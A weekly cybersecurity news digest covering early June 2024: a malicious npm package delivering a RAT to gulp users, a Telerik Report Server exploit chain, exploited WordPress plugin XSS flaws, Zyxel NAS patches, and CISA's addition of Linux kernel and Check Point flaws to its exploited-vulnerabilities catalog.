05/30/2024-06/05/2024 RAT-Dropping npm Package, XSS Flaws In Multiple WordPress Plugins, Actively Exploited Linux Kernel Flaw And More.

1. Researchers Uncover RAT-Dropping npm Package Targeting Gulp Users

Cybersecurity researchers found a malicious package, glup-debugger-log, in the npm registry designed to deploy a remote access trojan (RAT) on compromised systems. Targeting users of the gulp toolkit, it has been downloaded 175 times. Phylum, a software supply chain security firm, discovered the package includes two obfuscated files: one acts as an initial dropper, compromising the target and downloading additional malware, while the other maintains persistent remote access.
The package’s “index.js” file runs another obfuscated file, “play.js,” which performs checks to ensure it’s on an active developer machine. If successful, “play-safe.js” sets up persistence and can execute arbitrary commands via an HTTP server. Phylum described the RAT as both crude and sophisticated, highlighting evolving malware tactics in open-source ecosystems.

2. Exploit For Critical Progress Telerik Auth Bypass Released, Patch Now

Researchers have published a proof-of-concept (PoC) exploit script demonstrating a chained remote code execution (RCE) vulnerability on Progress Telerik Report Servers. The exploit chains an authentication bypass (CVE-2024-4358) and a deserialization flaw (CVE-2024-1800). The bypass flaw allows admin account creation without checks and has a CVSS score of 9.8. The deserialization flaw, with a CVSS score of 8.8, enables remote code execution via specially crafted XML payloads. Both issues have been addressed in updates, and organizations are urged to upgrade to version 10.1.24.514 or later. Administrators should review user lists for unfamiliar accounts due to potential exploitation.

3. XSS Flaws In Multiple WordPress Plugins Exploited To Deploy Malware

Researchers uncovered malware attacks exploiting XSS vulnerabilities in WordPress plugins. Attackers leveraged known flaws in three plugins: WP Meta SEO (CVE-2023-6961), LiteSpeed Cache (CVE-2023-40000), and WP Statistics (CVE-2024-2194). These high-severity vulnerabilities allowed the injection of malicious scripts. Fastly’s security team observed JavaScript malware performing functions such as installing PHP backdoors, creating rogue admin accounts, and setting up tracking scripts. Despite patches being available, active exploitation indicates that many sites are not updated. WordPress admins must update plugins to the latest versions to protect against these threats.

4. Zyxel Releases Patches for Firmware Vulnerabilities in EoL NAS Models

Zyxel has issued updates to address critical flaws in two end-of-life NAS devices. Three of the five vulnerabilities could allow unauthenticated attackers to execute OS commands and arbitrary code.

Affected models include NAS326 (versions V5.21(AAZF.16)C0 and earlier) and NAS542 (versions V5.21(ABAG.13)C0 and earlier). These issues are fixed in versions V5.21(AAZF.17)C0 and V5.21(ABAG.14)C0.

The flaws include:

• CVE-2024-29972: Command injection in “remote_help-cgi” via crafted HTTP POST.
• CVE-2024-29973: Command injection via the ‘setCookie’ parameter.
• CVE-2024-29974: Remote code execution via “file_upload-cgi” with a crafted file.
• CVE-2024-29975: Privilege management issue allowing root command execution.
  CVE-2024-29976: Privilege management issue leaking session information.

Outpost24’s Timothy Hjort reported these flaws. Users should update to the latest versions for protection.

5. CISA Alerts Federal Agencies to Patch Actively Exploited Linux Kernel Flaw

(CISA) on Thursday added a security flaw impacting the Linux kernel to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This high-severity issue, with a CVSS score of 7.8, involves a use-after-free bug in the netfilter component, allowing local attackers to escalate privileges to root. Also added to the KEV catalog is a newly disclosed security flaw impacting Check Point network gateway security products (CVE-2024-24919, CVSS score: 7.5) that allows an attacker to read sensitive information on Internet-connected Gateways with remote access VPN or mobile access enabled.

In light of the active exploitation of CVE-2024-1086 and CVE-2024-24919, federal agencies are recommended to apply the latest fixes by June 20, 2024, to protect their networks against potential threats.